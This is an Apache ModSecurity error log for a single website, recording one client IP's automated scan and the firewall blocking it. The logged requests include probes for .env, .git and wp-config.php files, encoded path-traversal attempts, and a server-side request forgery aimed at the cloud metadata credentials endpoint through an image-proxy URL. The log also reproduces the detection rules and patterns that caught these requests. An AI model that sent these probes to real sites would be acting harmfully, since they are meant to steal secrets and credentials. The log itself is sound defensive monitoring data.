[Tue May 12 05:04:39.223068 2026] [security2:error] [pid 1730175:tid 1730183] [client 45.148.10.42:27498] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.development"] [unique_id "agKYx3o6NvB9WXx5V-6mIgAAAQY"]
[Tue May 12 05:04:39.223224 2026] [security2:error] [pid 1730175:tid 1730183] [client 45.148.10.42:27498] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.development"] [unique_id "agKYx3o6NvB9WXx5V-6mIgAAAQY"]
[Tue May 12 05:04:39.231883 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.42:27576] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "letamsgarage.fr"] [uri "/_next/image"] [unique_id "agKYx9r1yOh9TvizeziXeAAAAFA"]
[Tue May 12 05:04:39.232684 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.42:27576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/_next/image"] [unique_id "agKYx9r1yOh9TvizeziXeAAAAFA"]
[Tue May 12 05:04:39.247976 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.42:27418] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKYx81tk6y7yBJLpJoyFwAAAIM"]
[Tue May 12 05:04:39.248158 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.42:27418] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKYx81tk6y7yBJLpJoyFwAAAIM"]
[Tue May 12 05:04:39.262991 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.42:27626] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKYxxfeipD4uoG21FopJAAAAAo"]
[Tue May 12 05:04:39.263171 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.42:27626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKYxxfeipD4uoG21FopJAAAAAo"]
[Tue May 12 05:04:41.857301 2026] [security2:error] [pid 1808852:tid 1808858] [client 45.148.10.42:27658] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/HEAD"] [unique_id "agKYyRfeipD4uoG21FopJwAAAAM"]
[Tue May 12 05:04:41.857503 2026] [security2:error] [pid 1808852:tid 1808858] [client 45.148.10.42:27658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/HEAD"] [unique_id "agKYyRfeipD4uoG21FopJwAAAAM"]
[Tue May 12 05:04:42.485008 2026] [security2:error] [pid 1825287:tid 1825314] [client 45.148.10.42:44814] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKYyggpmE1yW0glLdgmlQAAAMk"]
[Tue May 12 05:04:42.485211 2026] [security2:error] [pid 1825287:tid 1825314] [client 45.148.10.42:44814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKYyggpmE1yW0glLdgmlQAAAMk"]
[Tue May 12 05:04:42.488243 2026] [core:error] [pid 1730207:tid 1730217] [client 45.148.10.42:44872] AH10244: invalid URI path (/../.env)
[Tue May 12 05:04:42.502443 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.42:44792] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKYyhfeipD4uoG21FopKAAAABg"]
[Tue May 12 05:04:42.502601 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.42:44792] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKYyhfeipD4uoG21FopKAAAABg"]
[Tue May 12 05:04:42.520852 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.42:44830] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "letamsgarage.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKYyno6NvB9WXx5V-6mJgAAARE"]
[Tue May 12 05:04:42.520984 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.42:44830] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "letamsgarage.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKYyno6NvB9WXx5V-6mJgAAARE"]
[Tue May 12 05:04:42.521057 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.42:44830] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "letamsgarage.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKYyno6NvB9WXx5V-6mJgAAARE"]
[Tue May 12 05:04:42.521124 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.42:44830] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKYyno6NvB9WXx5V-6mJgAAARE"]
[Tue May 12 05:04:42.521301 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.42:44830] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKYyno6NvB9WXx5V-6mJgAAARE"]
[Tue May 12 05:04:42.523942 2026] [security2:error] [pid 1820198:tid 1820219] [client 45.148.10.42:44926] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKYys1tk6y7yBJLpJoyHwAAAJM"]
[Tue May 12 05:04:42.524112 2026] [security2:error] [pid 1820198:tid 1820219] [client 45.148.10.42:44926] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKYys1tk6y7yBJLpJoyHwAAAJM"]
[Tue May 12 05:04:42.527811 2026] [access_compat:error] [pid 1825287:tid 1825318] [client 45.148.10.42:44768] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:04:42.532142 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.42:44836] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.gitignore"] [unique_id "agKYyno6NvB9WXx5V-6mJwAAARM"]
[Tue May 12 05:04:42.532364 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.42:44836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.gitignore"] [unique_id "agKYyno6NvB9WXx5V-6mJwAAARM"]
[Tue May 12 05:04:42.535567 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.42:44880] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKYys1tk6y7yBJLpJoyIAAAAIw"]
[Tue May 12 05:04:42.535664 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.42:44880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKYys1tk6y7yBJLpJoyIAAAAIw"]
[Tue May 12 05:04:42.535823 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.42:44880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKYys1tk6y7yBJLpJoyIAAAAIw"]
[Tue May 12 05:04:42.536601 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.42:44854] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.ENV"] [unique_id "agKYyjue9Sp-pIv_Bb677gAAAVE"]
[Tue May 12 05:04:42.536746 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.42:44854] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.ENV"] [unique_id "agKYyjue9Sp-pIv_Bb677gAAAVE"]
[Tue May 12 05:04:42.544070 2026] [core:error] [pid 1825287:tid 1825329] [client 45.148.10.42:44860] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 05:04:42.548182 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.42:44888] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKYys1tk6y7yBJLpJoyIQAAAJc"]
[Tue May 12 05:04:42.548362 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.42:44888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agKYys1tk6y7yBJLpJoyIQAAAJc"]
[Tue May 12 05:04:42.552420 2026] [security2:error] [pid 1730175:tid 1730198] [client 45.148.10.42:44782] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env~"] [unique_id "agKYyno6NvB9WXx5V-6mKAAAARU"]
[Tue May 12 05:04:42.552590 2026] [security2:error] [pid 1730175:tid 1730198] [client 45.148.10.42:44782] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env~"] [unique_id "agKYyno6NvB9WXx5V-6mKAAAARU"]
[Tue May 12 05:04:42.916234 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.42:27622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYx3o6NvB9WXx5V-6mIQAAAQE"]
[Tue May 12 05:04:43.624181 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.42:27414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYxwgpmE1yW0glLdgmjwAAAMQ"]
[Tue May 12 05:04:43.832491 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.42:27626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYxxfeipD4uoG21FopJAAAAAo"]
[Tue May 12 05:04:44.755683 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.42:27576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYx9r1yOh9TvizeziXeAAAAFA"]
